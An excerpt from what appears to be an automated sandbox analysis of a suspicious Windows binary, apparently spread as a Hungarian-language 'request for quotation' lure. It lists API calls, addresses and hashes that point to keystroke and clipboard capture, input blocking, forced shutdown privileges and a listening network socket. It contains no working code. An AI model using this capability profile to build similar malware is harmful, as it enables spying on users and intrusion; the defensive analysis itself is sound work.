                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              APIs
                                                                • Part of subcall function 00639ABF: CLSIDFromProgID.OLE32 ref: 00639ADC
                                                                • Part of subcall function 00639ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00639AF7
                                                                • Part of subcall function 00639ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00639B05
                                                                • Part of subcall function 00639ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00639B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0065C235
                                                              • _memset.LIBCMT ref: 0065C242
                                                              • _memset.LIBCMT ref: 0065C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0065C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 0065C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 0065C3E5
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              APIs
                                                                • Part of subcall function 0063B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                                • Part of subcall function 0063B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                                • Part of subcall function 0063B134: GetLastError.KERNEL32 ref: 0063B1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00647A0F
                                                              Strings
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00658CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00658CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00658CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00658D10
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00646554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00646564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00646583
                                                              • __wsplitpath.LIBCMT ref: 006465A7
                                                              • _wcscat.LIBCMT ref: 006465BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006465F9
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$j
                                                              • API String ID: 0-850748383
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006413DC
                                                              Strings
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($,2k$<2k$|
                                                              • API String ID: 1659193697-1977981825
                                                              APIs
                                                                • Part of subcall function 0065A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00659296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006592B9
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064EB8A
                                                              • _wcscmp.LIBCMT ref: 0064EBBA
                                                              • _wcscmp.LIBCMT ref: 0064EBCF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0064EBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0064EC0E
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0061E014,75920AE0,0061DEF1,0069DC38,?,?), ref: 0061E02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0061E03E
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 4b29836da67fbb7be8d032909664ead7980918e246b0ee94af384053f0693888
                                                              • Instruction ID: 65e142e75fba7cfb9677e9c94d593e1a31d275210608153e2b6b0bb42befbb79
                                                              • Opcode Fuzzy Hash: 4b29836da67fbb7be8d032909664ead7980918e246b0ee94af384053f0693888
                                                              • Instruction Fuzzy Hash: 7AD05EB0400713AEC7215B61E8186D277D6AF14701F19441AE8C192290DAB4D8C18760
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 0061B22F
                                                                • Part of subcall function 0061B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0061B5A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: f057316e8e91869bd2ff741df314f2cdb907f795386ae8ff65d25b5f719e6260
                                                              • Instruction ID: 1fa933d41255d7fc44331e63c1b1441a11fe94b8ec0528607092a93a59c7124b
                                                              • Opcode Fuzzy Hash: f057316e8e91869bd2ff741df314f2cdb907f795386ae8ff65d25b5f719e6260
                                                              • Instruction Fuzzy Hash: B1A1A070114004BAEB38AF2A5C89DFF295FEB4B344B1C911DF405D6396CB369E8AD276
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006543BF,00000000), ref: 00654FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00654FD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: 02408031a34197a095b02570a79df5cea26c311de877fb5e051e6734fba715a2
                                                              • Instruction ID: d86324fbd81d0841bde43ce31eb2fdfcf51587c2d3eb74a5c1fa59f0706593e2
                                                              • Opcode Fuzzy Hash: 02408031a34197a095b02570a79df5cea26c311de877fb5e051e6734fba715a2
                                                              • Instruction Fuzzy Hash: 8041F971504605BFEB209E84DC85EFF77BEEB8031AF10406EFA0566280EB719E899764
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: \Qk
                                                              • API String ID: 4104443479-3811039747
                                                              • Opcode ID: 67a43dc52e3a104516fb2e7f5fdfd8e9185f76219a3baf1fd26926ee46bd2d07
                                                              • Instruction ID: fdb0ce00315255df1b38f9d5b5417a4d8ed87103695f313fd750453560f2eccb
                                                              • Opcode Fuzzy Hash: 67a43dc52e3a104516fb2e7f5fdfd8e9185f76219a3baf1fd26926ee46bd2d07
                                                              • Instruction Fuzzy Hash: D7A23E74E04219CFDB28CF58C4806EDB7B2FF58314F2582A9D859AB391D774AE82DB50
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064E20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0064E267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0064E2B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: eb316f7923fd3236fb4b87c3fa6ad3322a04f47487640abdda5fd1cacc199714
                                                              • Instruction ID: 9e76a45892e8508d4454e1a0d7cca5fdf39f93f011423818825c1f2a71d8de89
                                                              • Opcode Fuzzy Hash: eb316f7923fd3236fb4b87c3fa6ad3322a04f47487640abdda5fd1cacc199714
                                                              • Instruction Fuzzy Hash: F6216D75A00118EFCB40EFA5D884EEEBBBAFF48310F0484A9E945A7391DB319955CB64
                                                              APIs
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                              • GetLastError.KERNEL32 ref: 0063B1BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: aa639252c42bbd6d6fd41540e4c59e09a06bc08594837cd6cc3b47dd8cf3f53c
                                                              • Instruction ID: 611c4db014a222a8f24b7b6392a291c7592020b4e89de073fad4b6de6939be1f
                                                              • Opcode Fuzzy Hash: aa639252c42bbd6d6fd41540e4c59e09a06bc08594837cd6cc3b47dd8cf3f53c
                                                              • Instruction Fuzzy Hash: 87118FB1504205AFE7189F54DC85D6BB7AEFB44710B20852EE55697251DB70FC418B60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00646623
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00646664
                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0064666F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 4875530a681d0b1ee336c962a939f0d34a70200ec1d77c8dcb94075669f12a7d
                                                              • Instruction ID: 83c742b3a1b3628d3e121b2ce36ddcf3b19aecd3118b9ec893f5c5902ba879ac
                                                              • Opcode Fuzzy Hash: 4875530a681d0b1ee336c962a939f0d34a70200ec1d77c8dcb94075669f12a7d
                                                              • Instruction Fuzzy Hash: D9111E71E01228BFDB109FA9DC45BAEBBBDEB45B50F104156F900E6290D7B05E058BA6
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00647223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0064723A
                                                              • FreeSid.ADVAPI32(?), ref: 0064724A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: ac7c4d7a3a2df0c6c75827b3e6fd8f3c965372f6e114880286556747f42f1907
                                                              • Instruction ID: d4062b7788fc282c1e8630578eedd70039cb9cbe2df4172a7506773eb65dc1ce
                                                              • Opcode Fuzzy Hash: ac7c4d7a3a2df0c6c75827b3e6fd8f3c965372f6e114880286556747f42f1907
                                                              • Instruction Fuzzy Hash: 66F01D76A04309BFDF04DFE4DD89AEEBBB9EF08201F505569A602E21D1E3709A449B20
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064F599
                                                              • FindClose.KERNEL32(00000000), ref: 0064F5C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 155e43f33cd894f1116491a06eb2868e2c9651d3f705d2e8bfc4ddb3eb1497ec
                                                              • Instruction ID: 05b8c221421b6f8bfb26005e3b46d28eb8a4a807c4998aeff02920d834ae3fc8
                                                              • Opcode Fuzzy Hash: 155e43f33cd894f1116491a06eb2868e2c9651d3f705d2e8bfc4ddb3eb1497ec
                                                              • Instruction Fuzzy Hash: 5111C4716002009FD744EF28D849A6EB3EAFF94324F048A1EF9A5D7391DB70AD018B95
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0065BE6A,?,?,00000000,?), ref: 0064CEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0065BE6A,?,?,00000000,?), ref: 0064CEB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 1dd14c47aec4504b4b3a5d2baaad5c73b2dab56646f996fabb99e3c91a6445ff
                                                              • Instruction ID: 7e9d323d881291aad2e6943455f9c440edb0d3c1fc38192858ca2a12043f9ebe
                                                              • Opcode Fuzzy Hash: 1dd14c47aec4504b4b3a5d2baaad5c73b2dab56646f996fabb99e3c91a6445ff
                                                              • Instruction Fuzzy Hash: 0EF08231100329BBDB50DBA4DC49FEA777EBF09361F004265F915D61C1D7309A40CBA1
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00644153
                                                              • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00644166
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: be2053521a07125c70c679b0d30dced545d725f81965f3d463346b4847776965
                                                              • Instruction ID: 0a3720c1d3e89ec72b2a5ac30382388bc3151823f03d03c97b0b5fa2e54cb738
                                                              • Opcode Fuzzy Hash: be2053521a07125c70c679b0d30dced545d725f81965f3d463346b4847776965
                                                              • Instruction Fuzzy Hash: B3F0677080028DAFDB058FA0C806BBE7BB1EF00305F00801AF966A6292D7798612DFA0
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0063ACC0), ref: 0063AB99
                                                              • CloseHandle.KERNEL32(?,?,0063ACC0), ref: 0063ABAB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 351631650e4844862da2ed48188f08aacea382701e3b433763bbf0070a58730f
                                                              • Instruction ID: 3dcb501902127fd5f78017e2f48cacb350450683eda09b41ce6bc81442246d02
                                                              • Opcode Fuzzy Hash: 351631650e4844862da2ed48188f08aacea382701e3b433763bbf0070a58730f
                                                              • Instruction Fuzzy Hash: C2E0BF71000510AFE7652F54EC05DB6B7ABEB04320B14852DB49A81470D7625C90AB50
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00626DB3,-0000031A,?,?,00000001), ref: 006281B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006281BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 6b874024b9d55f3249db78c10e4bf4959a07b0f4b78c4628eaf544d11009e03b
                                                              • Instruction ID: f8e82ec068534a0bf16395931177475c382e7c8a7426cb2fa5c2807f3400f118
                                                              • Opcode Fuzzy Hash: 6b874024b9d55f3249db78c10e4bf4959a07b0f4b78c4628eaf544d11009e03b
                                                              • Instruction Fuzzy Hash: FEB09231084608FBDB002BA1EC09B587F6AEB0A652F005120F60D840A18B7254108BA2
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31d364e22573fed2398247715b8df3877d85e5132d84c0b3aec9de883c2740ce
                                                              • Instruction ID: 53a5ca5055266614d434b1dd8359d8c74a7a7ed04d5e0d73d6ab3964721ac65d
                                                              • Opcode Fuzzy Hash: 31d364e22573fed2398247715b8df3877d85e5132d84c0b3aec9de883c2740ce
                                                              • Instruction Fuzzy Hash: AA32F321D29F114DD7239A34D932335A28EAFB73D4F15D727E819B5EA6DB29C4C34500
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: 4d60d791f8351e20476f3922e360a6a38d316e38cc47dae9b77c40cae4b6899c
                                                              • Instruction ID: 6384bbae90ba7379b8b1c298a108feee46330ab9c5f9f7a783316450d0da0b9f
                                                              • Opcode Fuzzy Hash: 4d60d791f8351e20476f3922e360a6a38d316e38cc47dae9b77c40cae4b6899c
                                                              • Instruction Fuzzy Hash: 3922CB716483019FC768DF24C890BAFB7E7AF84310F14891DF89A87292DB71E945CB96
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb145a1757f0daa557abba2e5027028082734df1e2c22f17434753e773f3edd9
                                                              • Instruction ID: b96096fdb3c4d171ae544d68d14bf259bf9e85c58d2a684b14b7d7f29415d5d7
                                                              • Opcode Fuzzy Hash: fb145a1757f0daa557abba2e5027028082734df1e2c22f17434753e773f3edd9
                                                              • Instruction Fuzzy Hash: C2B1F220D2AF414DD7239A398831336B65DAFBB2D5F91E71BFC1B74D22EB2185934280
                                                              APIs
                                                              • __time64.LIBCMT ref: 0064B6DF
                                                                • Part of subcall function 0062344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0064BDC3,00000000,?,?,?,?,0064BF70,00000000,?), ref: 00623453
                                                                • Part of subcall function 0062344A: __aulldiv.LIBCMT ref: 00623473
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: 52fa95e48d02c8cad3f1fd163114cc1197fc29a7c7b54922a837f374802a1a25
                                                              • Instruction ID: 19039a4adec714644bd70c8f1559b6c7edde0051cb9ea80101a812aef62f53ca
                                                              • Opcode Fuzzy Hash: 52fa95e48d02c8cad3f1fd163114cc1197fc29a7c7b54922a837f374802a1a25
                                                              • Instruction Fuzzy Hash: 652160726345508BC729CF28D881AA2B7E6EB95310B249E6DE4E5CB280CB74E905DB54
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00656ACA
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: 3e51d9dd7ebccd49149c85e89fcf45f69f871b02b8599412e198f979d5e18ee3
                                                              • Instruction ID: 549c413e6816779022c4fd7ae89feee6752ab2784a96370d15664ba4404aa242
                                                              • Opcode Fuzzy Hash: 3e51d9dd7ebccd49149c85e89fcf45f69f871b02b8599412e198f979d5e18ee3
                                                              • Instruction Fuzzy Hash: 9DE048352102046FD740EFA9D404D96B7EEAF74751F04C41AFA46D7391DAB0F8448BA0
                                                              APIs
